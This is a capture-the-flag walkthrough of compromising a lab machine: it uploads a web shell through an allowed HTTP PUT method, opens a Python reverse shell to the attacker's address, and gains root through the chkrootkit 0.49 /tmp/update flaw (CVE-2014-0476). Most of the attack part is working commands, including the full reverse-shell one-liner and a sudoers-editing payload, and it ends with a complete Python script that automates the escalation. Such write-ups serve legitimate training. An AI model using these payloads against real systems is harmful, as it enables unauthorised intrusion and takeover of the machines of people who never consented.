For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the machine looks like:

We start the attack by finding the IP of the victim machine with the netdiscover command:
$ netdiscover

Now that we know our target IP, let us start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

Port 22 – Running OpenSSH
Port 80 – Running lighttpd

Let us head over to the browser to see if we find something useful:

After going through the source code of the page, I do not find anything useful. Let us fire up DirBuster to see if the server is hiding anything from us. A quick run shows that a /test/ directory is present:

Heading over to the directory, it is a blank directory listing.

Since DirBuster has not come up with anything else so far, let us see what the server lets us do with this directory. A simple cURL OPTIONS request tells us which HTTP methods are allowed on it:
$ curl -v -X OPTIONS http://172.16.92.137/test

Well, that is interesting! PUT is among the allowed methods, which means we can create a new resource under /test/ (on lighttpd this normally means mod_webdav is enabled for that directory). So we upload a PHP file:
$ curl -v -X PUT -d '' http://172.16.92.137/test/shell.php

The above request creates shell.php in the /test/ directory. The request body (the -d argument, left empty above) is where the PHP code that gets us a command line goes: it must execute whatever arrives in the cmd query parameter, since that is how shell.php is driven in the next step, and the server stores the body verbatim as the new file. The verbose output confirms the upload:

With that, we have exploited the vulnerability, but only partially: a web shell is not a proper shell. Now let us try to get a reverse shell. I will be using the following Python reverse shell (more can be found at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.92.133",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let us start a listener on port 443 and send the above command, URL-encoded, through the web shell we just uploaded:
$ curl "http://172.16.92.137/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22172.16.92.133%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"

Note: I tried to use port 444 and 4444, but it did not work as they are blocked. Voila, we have a low privilege shell:

Now let's explore the system and see what else is there we can exploit to become root. After some time, I stumbled upon something really interesting in /etc/cron.daily:

cron.daily is where the cron (automatic) jobs that the server runs once a day are kept, and here I can see a chkrootkit job. On further examination, I see that the version of chkrootkit in question is 0.49!

After some research, it turns out this version has a known local privilege escalation (CVE-2014-0476): the slapper() check in chkrootkit 0.49 contains the unquoted assignment file_port=$file_port $i, so when /tmp/update exists and is executable, the script runs it as root instead of merely recording its name. I used the following exploit: https://www.exploit-db.com/exploits/33899/
$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
This writes a file named update to /tmp/. The chmod 440 at the end matters: sudo refuses a sudoers file that is writable by anyone but root, so without it we would lock ourselves out of the very access we just granted. Make the file executable, otherwise chkrootkit cannot run it:
$ chmod 777 /tmp/update
Once done, wait for the cron job to run chkrootkit (a couple of minutes was enough here) and then type:
$ sudo su
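The exploit-db entry boils down to the three shell lines above. The script below is an added example, not the exploit-db code or anything from the original write-up: it plants the same /tmp/update payload, but first checks that the chkrootkit script on the box really carries the unquoted slapper() assignment the bug depends on, and afterwards polls sudo instead of guessing how long to wait. The chkrootkit path (/usr/sbin/chkrootkit) and the version string format (CHKROOTKIT_VERSION='0.49' near the top of the script) are assumptions; the check degrades to "unknown" if either is wrong.

```python
#!/usr/bin/env python3
"""chkrootkit 0.49 /tmp/update privilege escalation (CVE-2014-0476) with pre-flight checks."""
import os
import re
import subprocess
import time

CHKROOTKIT = "/usr/sbin/chkrootkit"   # assumed install path (Debian package location)
UPDATE = "/tmp/update"
USER = "www-data"                     # the web server user we got the reverse shell as

# In 0.49, slapper() runs `file_port=$file_port $i` for every name in SLAPPER_FILES,
# /tmp/update among them. With file_port empty, sh parses that as "run command $i
# with file_port= in its environment", so an executable /tmp/update runs as root.
# 0.50 fixed it by quoting: file_port="$file_port $i".
VULN_LINE = re.compile(r"^\s*file_port=\$file_port \$i\s*$", re.M)
# Assumed format of the version variable at the top of the chkrootkit script.
VERSION = re.compile(r"CHKROOTKIT_VERSION='([^']+)'")


def chkrootkit_version(script: str):
    """Version string from the script text, or None if the assumed variable is absent."""
    m = VERSION.search(script)
    return m.group(1) if m else None


def has_unquoted_slapper_assignment(script: str) -> bool:
    """True when the vulnerable, unquoted file_port assignment is present."""
    return VULN_LINE.search(script) is not None


def build_update_payload(user: str = USER) -> str:
    """Same effect as the write-up's one-liner: passwordless sudo for `user`,
    then mode 0440 restored so sudo will still accept the file."""
    return ("#!/bin/sh\n"
            "chmod 777 /etc/sudoers\n"
            f'echo "{user} ALL=NOPASSWD: ALL" >> /etc/sudoers\n'
            "chmod 440 /etc/sudoers\n")


def plant(path: str = UPDATE, user: str = USER) -> None:
    """Write the payload and make it executable; chkrootkit invokes it by name."""
    with open(path, "w") as f:
        f.write(build_update_payload(user))
    os.chmod(path, 0o755)


def sudo_works() -> bool:
    """sudo -n never prompts; exit 0 means the NOPASSWD rule is now in place."""
    return subprocess.run(["sudo", "-n", "true"], capture_output=True).returncode == 0


def wait_for_root(poll: int = 15, limit: int = 900) -> bool:
    """Poll until sudo succeeds or `limit` seconds pass (the daily job may take a while)."""
    deadline = time.time() + limit
    while time.time() < deadline:
        if sudo_works():
            return True
        time.sleep(poll)
    return False


if __name__ == "__main__":
    try:
        with open(CHKROOTKIT) as f:
            script = f.read()
    except OSError:
        script = ""
    print("chkrootkit version:", chkrootkit_version(script) or "unknown")
    print("unquoted slapper() assignment present:", has_unquoted_slapper_assignment(script))
    plant()
    print(f"planted {UPDATE}; waiting for the cron job to run chkrootkit as root")
    if wait_for_root():
        os.execvp("sudo", ["sudo", "su"])
    print("timed out; check that /etc/cron.daily/chkrootkit actually runs on this box")
```

The detection half is reusable on its own: feeding it any chkrootkit script tells you whether the box is exposed without planting anything, which is the question to ask before choosing this path on a real engagement.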

Now we have root! Let us head over and read the flag.